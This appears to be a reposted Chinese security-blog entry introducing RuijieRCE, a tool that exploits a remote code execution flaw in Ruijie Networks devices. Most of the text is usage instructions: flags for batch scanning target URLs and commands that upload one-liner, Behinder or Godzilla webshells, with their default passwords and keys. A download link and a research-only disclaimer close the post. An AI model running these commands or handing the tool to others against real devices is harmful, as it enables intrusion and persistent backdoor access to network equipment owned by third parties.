锐捷RCE漏洞检测工具 RuijieRCE

admin 2025年6月7日14:39:24评论7 views字数 844阅读2分48秒阅读模式

\

0x01 工具介绍

Ruijie Networks RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。同时也可以上传冰蝎马或者哥斯拉马。批量检测支持并发。

Usage of ./RuijieRCE:  -f string    导入.txt文件批量扫描  -k string    写入shell密钥,一句话马默认为cmd,哥斯拉马默认为key,冰蝎马没有密钥  -n string    写入shell默认一句话马🐎,B冰蝎马,G哥斯拉马  -p string    写入shell密码,一句话马默认为cmd,哥斯拉马默认为pass,冰蝎马默认为rebeyond  -u string    目标URL
0x02 安装与使用

检测到漏洞后生成随机数.php文件执行命令,也可以上菜刀。

锐捷RCE漏洞检测工具  RuijieRCE

上传一句话木马

GET密码:cmd POST密码:cmd

./RuijieRCE -u http://127.0.0.1:4430

设置密码

-n参数为POST密码,-p参数为GET密码 这两个参数缺省时均为cmd,可以只设置一个或者同时都设置

./RuijieRCE -u http://127.0.0.1:4430 -n asd -p zxc

上传冰蝎马

默认密钥为rebeyond,也可以使用-p参数修改

./RuijieRCE -u http://127.0.0.1:4430 -n B -p rebeyond

上传哥斯拉马

哥斯拉加密器使用BASE64,默认密码为pass,密钥为key

./RuijieRCE -u http://127.0.0.1:4430 -n G -p pass -k key

批量测试

批量测试时也可以设置上传冰蝎马、哥斯拉马以及自定义密码

./RuijieRCE -f url.txt

· 下載

https://github.com/1ight-2020/RuijieRCE

原文始发于微信公众号(Web安全工具库):锐捷RCE漏洞检测工具 -- RuijieRCE(2月26日更新)

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日14:39:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   锐捷RCE漏洞检测工具 RuijieRCEhttps://cn-sec.com/archives/3775880.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息